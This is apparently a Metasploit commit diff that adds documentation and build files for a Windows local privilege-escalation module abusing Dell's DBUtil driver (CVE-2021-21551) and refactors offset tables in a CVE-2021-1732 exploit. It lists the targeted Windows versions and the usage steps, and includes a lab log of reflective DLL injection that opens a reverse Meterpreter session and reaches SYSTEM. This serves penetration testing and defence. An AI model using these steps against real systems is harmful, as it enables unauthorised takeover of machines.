rapid7 · bwatters-r7 · May 14, 2021 · May 12, 2021 · May 12, 2021 · May 12, 2021
diff --git a/data/exploits/CVE-2021-1732/CVE-2021-1732.x64.dll b/data/exploits/CVE-2021-1732/CVE-2021-1732.x64.dll
diff --git a/data/exploits/CVE-2021-21551/CVE-2021-21551.x64.dll b/data/exploits/CVE-2021-21551/CVE-2021-21551.x64.dll
diff --git a/documentation/modules/exploit/windows/local/cve_2021_21551_dbutil_memmove.md b/documentation/modules/exploit/windows/local/cve_2021_21551_dbutil_memmove.md
@@ -0,0 +1,67 @@
+## Vulnerable Application
+The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by an attacker
+read and write kernel-mode memory.
+
+### Supported Targets
+
+* Windows 7 SP0 x64
+* Windows 7 SP1 x64
+* Windows 8.1 x64
+* Windows 10 x64 v1607 - v2009 (20H2)
+* Windows Server 2016 x64
+* Windows Server 2019 x64
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a Meterpreter session on a vulnerable host
+1. Do: `use exploit/windows/local/cve_2021_21551_dbutil_memmove`
+1. Set the `SESSION` and `PAYLOAD` options
+1. Do: `run`
+1. You should get a shell.
+
+## Scenarios
+
+### Windows 10 Version 1909 Build 18363.418 x64
+
+```
+msf6 exploit(multi/handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Sending stage (200262 bytes) to 192.168.159.79
+[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.79:57013) at 2021-05-12 16:10:10 -0400
+
+meterpreter > sysinfo
+Computer        : DESKTOP-RTCRBEV
+OS              : Windows 10 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 5
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-RTCRBEV\Alice Liddle
+meterpreter > getsystem
+[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+[-] Named Pipe Impersonation (RPCSS variant)
+meterpreter > run exploit/windows/local/cve_2021_21551_dbutil_memmove
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Launching notepad to host the DLL...
+[+] Process 5212 launched.
+[*] Reflectively injecting the DLL into 5212...
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+[*] Sending stage (200262 bytes) to 192.168.159.79
+[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.79:57015) at 2021-05-12 16:12:43 -0400
+[*] Session 3 created in the background.
+meterpreter > sessions 3
+[*] Backgrounding session 2...
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
diff --git a/external/source/exploits/CVE-2021-1732/CVE-2021-1732.vcxproj b/external/source/exploits/CVE-2021-1732/CVE-2021-1732.vcxproj
@@ -105,7 +105,7 @@
       <PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>false</ConformanceMode>
       <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
-      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
       <TreatWarningAsError>true</TreatWarningAsError>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
@@ -133,7 +133,7 @@
       <PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>false</ConformanceMode>
       <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
-      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
       <TreatWarningAsError>true</TreatWarningAsError>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
@@ -161,10 +161,10 @@
       <IntrinsicFunctions>false</IntrinsicFunctions>
       <SDLCheck>
       </SDLCheck>
-      <PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions);UMDF_USING_NTSTATUS</PreprocessorDefinitions>
       <ConformanceMode>false</ConformanceMode>
       <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
-      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <TreatWarningAsError>true</TreatWarningAsError>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <StringPooling>true</StringPooling>
@@ -195,10 +195,10 @@
       <IntrinsicFunctions>false</IntrinsicFunctions>
       <SDLCheck>
       </SDLCheck>
-      <PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions);UMDF_USING_NTSTATUS</PreprocessorDefinitions>
       <ConformanceMode>false</ConformanceMode>
       <PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
-      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;..\..\include\windows;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
       <TreatWarningAsError>true</TreatWarningAsError>
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
       <StringPooling>true</StringPooling>
@@ -231,9 +231,6 @@ copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\exploits\$(ProjectName
     <ClCompile Include="dllmain.c" />
     <ClCompile Include="exploit.c" />
   </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="definitions.h" />
-  </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">
     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />

diff --git a/external/source/exploits/CVE-2021-1732/definitions.h b/external/source/exploits/CVE-2021-1732/definitions.h
diff --git a/external/source/exploits/CVE-2021-1732/exploit.c b/external/source/exploits/CVE-2021-1732/exploit.c
@@ -1,8 +1,12 @@
 #include <windows.h>
 #include <time.h>
 
+#include "common.h"
 #include "definitions.h"
 
+#define ConsoleAcquireDisplayOwnership 6
+typedef PVOID(NTAPI* fxxxClientAllocWindowClassExtraBytes)(PSIZE_T pSize);
+
 typedef DWORD64 QWORD;
 
 fHMValidateHandle HMValidateHandle = NULL;
@@ -27,18 +31,9 @@ DWORD g_Thrdeskhead_cLockboj_Max = 0;
 
 
 const EPROCESS_OFFSETS* g_pEprocessOffsets = NULL;
-const EPROCESS_OFFSETS g_EprocessOffsets1803 = { 0x2f0, 0x360, 0x2e8 }; /* v1803 - v1909 */
-const EPROCESS_OFFSETS g_EprocessOffsets2004 = { 0x448, 0x4b8, 0x440 }; /* v2004 - v20H2 */
 const WORD offset_tagWND_WndExtra = 0x128;
 
 
-typedef struct _MSF_PAYLOAD {
-	DWORD  dwSize;
-	CHAR  cPayloadData[];
-} MSF_PAYLOAD;
-typedef MSF_PAYLOAD* PMSF_PAYLOAD;
-
-
 ULONG_PTR GetPEB(void) {
 	return (ULONG_PTR)__readgsqword(0x60);
 }
@@ -198,11 +193,11 @@ BOOL ResolveRequirements(void) {
 	}
 	/* v1803 - v1909*/
 	else if (dwBuild < 19041) {
-		g_pEprocessOffsets = &g_EprocessOffsets1803;
+		g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
 	}
 	/* v2004 - v20H2 */
 	else if (dwBuild < 19043) {
-		g_pEprocessOffsets = &g_EprocessOffsets2004;
+		g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
 	}
 	else {
 		return FALSE;

diff --git a/external/source/exploits/CVE-2021-21551/CVE-2021-21551.sln b/external/source/exploits/CVE-2021-21551/CVE-2021-21551.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.31205.134
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2021-21551", "CVE-2021-21551.vcxproj", "{49BF5C03-2BA1-49DC-BF5F-090172639200}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x64.ActiveCfg = Debug|x64
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x64.Build.0 = Debug|x64
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x86.ActiveCfg = Debug|Win32
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x86.Build.0 = Debug|Win32
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x64.ActiveCfg = Release|x64
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x64.Build.0 = Release|x64
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x86.ActiveCfg = Release|Win32
+		{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {5B88D6B4-8084-4B6A-A5F7-00912F52E630}
+	EndGlobalSection
+EndGlobal